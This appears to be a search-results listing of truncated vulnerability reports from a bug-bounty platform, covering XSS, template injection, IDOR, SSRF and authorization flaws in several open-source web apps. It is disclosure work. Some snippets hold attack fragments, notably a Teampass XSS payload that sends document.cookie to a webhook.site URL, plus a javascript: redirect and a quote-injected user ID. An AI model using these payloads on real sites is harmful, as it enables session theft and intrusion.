4072 matches found
Stored XSS in the delete confirmation popup
Description The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Proof of Concept Step1: The user with the privilege to create group creates a new group by passing a payload into...
Server-Side Template Injection leads to Remote Code Execution
Description Admin or Staff with "Mass mailer" permission can perform a Server-Side Template Injection attack Proof of Concept Log in as an admin or a staff who has "Mass mailer" permission, edit a message In the "Email content" field, insert the following value and click "Update and preview" %...
Leak Secret tokens by changing baseURL
Description nuxt-api-party allows developers to easily hook up APIs. You can configure API URLs and Credentials to be sent on requests. It is suggested in the documentation that this plugin is capable of handling sensitive data. There is a design flaw that could allow an attacker to extract priva...
Stored XSS on entire Client site
Description Admin or Staff with "System" permission can produce a store XSS on entire Client site Proof of Concept Edit the "Signature" field to this value "FOSSBilling.org - Client Management, Invoice and Support Software"" Then it will trigger in every Client screens Seems like it was rendered ...
The ability to edit groups owned by any user.
Description The edit group function does not check the owner, allowing for the possibility to modify a group without being the owner of that group. Proof of Concept Step 1: We have User1 who owns Group 1 and Group 2; User5 who owns Group 5. Step 2: User1 performs an edit group action and changes...
Desktop APP XSS to RCE
🔒️ Requirements The user must load the malicious configuration and click on the buttons. 📝 Description This exploitation relies on several issues which chained together lead to an RCE. In the following subsection, I will try to explain it as best I can. 💉 Not sanitized HTML injection In the...
Improper Authorization leads to privilege escalation
Description The application improperly performs user authorization, resulting in a user with the user management role being able to modify their own permissions or those of others. Proof of Concept Step1: The highest-level administrator or an administrator with the permission to create roles...
Incorrect Authorization leads to delete user
Description The application is experiencing incorrect permission settings, leading to the user with user administration rights being able to delete anyone, including users who are not under their management authority. Proof of Concept Step1:The User Demo super admin creates a user admin with user...
Session Fixation Vulnerability
Description The application does not generate a new PHPSESSID cookie after the user authenticates successfully. A malicious user is able to create a new session cookie value and injects it to a victim pre-authenticaiton. After the victim logs in, the injected cookie becomes valid, giving the...
The user can delete himself
Description Bypassing the conditional check leads to the user can delete himself. Proof of Concept Step 1: The user with id 18834 attempts to delete himself but encounter an error Step 2: By using userid=18834' instead of userid=18834, the user was able to successfully delete himself...
Able to change username that is by default unchangeable
Description The website receives input from the user that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified. Proof of Concept Step 1: We have a user with ID 18833 and the...
The app allows to set new password same as old password
Description 1/ Access and login to the demo website: https://demo.openitcockpit.io 2/ At changing password function, set new password as same as old password. 3/ Logout and re-login to check, it's successful. Proof of Concept Link video PoC:...
Sensitive Cookie Without Secure Flag
Description Access and login to the demo website: https://demo.openitcockpit.io/ Press F12 on your keyboard or right-click on the website to open dev-tool. At Application tab, choose Cookies and there are some sensitive cookies without Secure flag. CookieAuth, csrfToken Proof of Concept Link imag...
Sensitive Cookie Without HttpOnly Flag
Description Access and login to the demo website: https://demo.openitcockpit.io/ Press F12 on your keyboard or right-click on the website to open dev-tool. At Application tab, choose Cookies and there is CookieAuth sensitive cookie without HttpOnly flag. Proof of Concept Link image evidence:...
heap-buffer-overflow in function id3dmx_flush filters/reframe_mp3.c
Description Heap-buffer-overflow in MP4Box. Version bash MP4Box - GPAC version 2.3-DEV-revrelease c 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC:...
Desktop APP RCE via saveDraft IPC
🔒️ Requirements The user must load a malicious project. 📝 Description In version 20.3.3 commit 5383c20e947fd772668316e407edc5d5db4850db, the shell=true option is added to a spawn execution. This is really dangerous has it allows a malicious user to execute commands even from attributes. Example: j...
XSS Filter Bypass in Folder Name leading to Information Disclosure
Description Proof of Concept First, login to Teampass and go to the Folders tab. Create a new folder using Hex entities in the Label. In this case: scriptfetchhttpswebhooksitejlk documentcookiescript which is fetch'https://webhook.site/jlk/' + document.cookie Next, select the created folder and...
Local file read through %load_json
Description When ALLOWPLANTUMLINCLUDE is set to false the default settings in the online server, !include processing is turned off, preventing local files from being read. However, other features like %loadjson can still access local files. Since many people will run plantuml-server in its defaul...
URL Restriction Bypass
Description In attempting to fix a previous issue, the PATTERNUSERINFO regular expression was changed. This change introduced another way to bypass the URL allowlist by introducing non-alphanumeric characters into the user information part of the URL. Proof of Concept Run PlantUML with...
IDOR in message deletion
Description user can delete others's message. we know the report https://huntr.dev/bounties/24ae402f-220f-41c6-962e-47c26938986e/ , but we find that we do not fix one case. Proof of Concept 1 user1 send admin a greeting card1 2 user2 send admin a greeting card2 3 user1 delete his message related ...
Users can order Add-Ons Separately
Description I find a requirement that addons must be purchased in conjunction with a product. However, a vulnerability has been discovered where an attacker can modify the product ID during the order process, allowing them to bypass the main product order requirement and directly purchase the...
Directory listing in multiple endpoints
Description Teampass has directory listing by default for various endpoints that eventually discloses application-specific and user data and files. Proof of Concept Visit the following endpoint without logging in to the application. Sensitive - https://127.0.0.1/includes configs -...
Stored XSS via Default session expiration time
Description The Default session expiration time feature when submitted HTML/JS tags executes the code in the login page. Proof of Concept Login to Teampass and go to Settings = Options. http://127.0.0.1/index.php?page=options In theDefault session expiration time input field insert an XSS payload...
Downloadable product type lacks order status check
Description There is a vulnerability in fossbilling where upgrading non-active orders is prevented, but it is possible to still do so through the upgrade API...
Privilege Escalation Vulnerability in Product Upgrade Module
Description Our product upgrade module contained a privilege escalation vulnerability that would allow an unauthorized user to upgrade to a product they were not authorized to. After an administrator had Product 1 can upgrde as Product2 , but not Product3, a user could use Burpsuite to intercept...
Security vulnerability in product bundling feature
Description Our e-commerce platform offers a bundled sales promotion feature, allowing an administrator to bind the sale of a product to an addon. However, we have identified a security vulnerability that exists in this feature. After an administrator cancels a bundle offer, users can still make...
Serious Security Vulnerability Discovered in Promotion
Description I am writing to report a serious security vulnerability that we have uncovered. Specifically, we have found that promotions applied to certain client groups are still being honored even after the promotions are no longer applicable to those groups. This means that attackers can...
we still can order the product even it is disabled
Description I am writing to report a potential security vulnerability that was uncovered in your platform. Specifically, we discovered that your product purchase functionality can still be accessed via API even after the product has been disabled and is no longer available for sale. Proof of...
Stored XSS in Survey Groups Function
Description By Injecting the payloads to the fields Title, Description, users who visited "Survey list" screen maybe compromises Proof of Concept Step 1: Login as Administrator, go to the "Survey list" screen function, click "create survey group" button. Step 2: Inject the payload to the fields...
Stored XSS vulnerability
Description The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Proof of Concept 1 Step1: The user has the right to access and perform the creation of surveys, with the payload...
Unauthenticated Blind SSRF
Description The Oxeye research team found Owncast vulnerable to an Unauthenticated Blind SSRF vulnerability. This vulnerability may allow an unauthenticated attacker to force the Owncast server to send HTTP requests to arbitrary locations using the GET HTTP method. This vulnerability also allows...
Open Redirect on follow/unfollow user's profile action
Description The idea is similar to CVE-2022-1058 https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d/ . Browsers interpreted \example.com - https://example.com and lead to open redirect Proof of Concept The vulnerable API is lie in follow/unfollow action on user's profile. In order to...
Formula Injection vulnerability in CSV export feature
Description The admidio application is vulnerable to Formula Injection/CSV injection via the Firstname, Lastname input fields. These vulnerabilities allow unauthenticated attackers to execute arbitrary code via a a crafted excel file. Proof of Concept 1. Create a member with role Associations boa...
Stored XSS via file upload in FireFox
Description Upload html file containing XSS payload. Payload ' On opening and refreshing the page, XSS payload executes in Firefox. Proof of Concept https://drive.google.com/file/d/1Irkg0u-8DcEizRSN3xE87ezEWmp0L4j/view?usp=sharing...
HTML Injection in Folder Name
Description The folder name does not sanitize folder name and due to missing output encoding, HTML user-input is rendered in the webpage during folder deletion. Proof of Concept 1. Login to Teampass as any user. 2. Go to Folders tab. 3. Create a new folder with HTML tag in the Label. Example: HTM...
IDOR can make attackers add or close others' unavaiable
both user1 and user2 are Providers 1 user1 login and add unavaiable 2 request can be like POST /index.php/backendapi/ajaxsaveunavailable HTTP/1.1...
we can still send the photo as greeting card even the albums is locked
1 admin create a album and upload a photo 2 member-1 login and send the photo as greeting card to member-2 3 member-1 use burpsuite hijack the request, which can be like POST /admprogram/modules/ecards/ecardsend.php HTTP/1.1...
Stored XSS in many configuration fields
Description Paste the XSS payload into the configuration fields. And I think there are many fields to configure that can be vulnerable to Stored XSS vulnerabilities, such as configuration fields in Options, MFA, API, Emails,... hope you check it too. Proof of Concept...
Create multiple user with the same username (Race Condition)
Description Administrator users can create multiple users with the same username which breaks the logic of the web application. Proof of Concept Step 1: At AdministrationUser ManagementManager User Screen, click on "New Local User" button Step 2: Fill in all the required fields, notice that the...
HTML Injection / Possible XSS
Description In pimcore I was able to identify a Unauthenticated HTML Injection / XSS Possible. Conditions: 2 factor authentication must not set before Vulnerable Endpoint: http://localhost/admin/login/2fa-setup Vulnerable Param: error= How it works, So basically any admin, who has not setup 2...
CSRF on /api/graphql query executing the mutations through GET requests
Description Mutations are saveRecord or createProcess queries used in Graphql. SuiteCRM prevents CSRF in this functionality by sending a POST request with a X-Xsrf-Token header. the bug here is that, when we send a GET request, the backend does not expect the X-Xsrf-Token header. Using this, an...
Stored XSS on user's name
Description Paste the payload XSS into the Name or Last name field. XSS vulnerability will trigger. Proof of Concept https://drive.google.com/file/d/1hoZkCxzTQbcIDy28hKJyjyrOD1Pcaaz0/view?usp=sharing...
The web app does not verify weak password at backend
Description Access and login to the demo website: https://cloudexplorer-lite-demo.fit2cloud.com/ At changing password function, the backend does not verify weak passwords so that user can do: 1/ Set new password as same as old password. 2/ Set new password by one character, such as 1. This case c...
missing permission check for API /setting/workspace/member/update
Proof of Concept 1 user1 是workspace1的空间管理员 2 user2 是workspace1的成员 3 user1 更新user2的信息,比如将其更新为空间管理员 4 使用burpsuite拦截请求 POST /setting/workspace/member/update HTTP/1.1 Host: 192.168.213.128:8081 Content-Length: 144 Accept-Language: zh-CN WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7 User-Agent:...
Stored XSS in End page
Description Allows a user who only has the authority to create surveys not the administrator to bypass validation and embed javascript schemes when creating surveys Step to reproduce - Login as administrator 1. Open User management and Create a user with create surveys only permissions. 1. Logout...
OOB read from unchecked return
Environment bash Distributor ID: Debian Description: Debian GNU/Linux bookworm/sid Version I checked against the latest release as of 05/29/23 the current master branch at commit 4f810869b06b5d7b0cb73d166864dfb4b1e900f6 . Description This AddressSanitizer output is indicating a read on an unknown...
DOM Cross Site Scripting and openredirect
Vulnerable Endpoint: https://demo.saleor.io/default-channel/en-US/account/login/?next=javascript:alert1 Description: 1. Hello team, Recently i found that, on saleor React storefront dashboard there is a DOM XSS and open-redirect vulnerability Steps to reproduce XSS: 1. Go to the above mentioned...
Cross-Site Scripting (Stored XSS)
Description With Association's board role, i can add a new web link. But, when i create a link, in Link name input field can insert an onfocus/autofocus attribute because do not processing for double quote. Proof of Concept 1. Login by account with Association's board role 2. Access funtion Web...
Improper Authorization in "Customer automation rules" function
Description The product performs authorization checks incorrectly when an unauthorized actor tries to access a resource or perform an actions. Proof of Concept The user does not have permission to delete the rule. Location - GET /admin/customermanagementframework/rules/list - POST...
Integer Overflow in tjexample.c
Description The tjexample.c example program uses tjAlloc function to allocate the output buffer of the JPEG buffer. tjAlloc uses malloc which takes a sizet number of bytes an unsigned integer. However, tjAlloc itself takes the number of bytes as a signed integer:...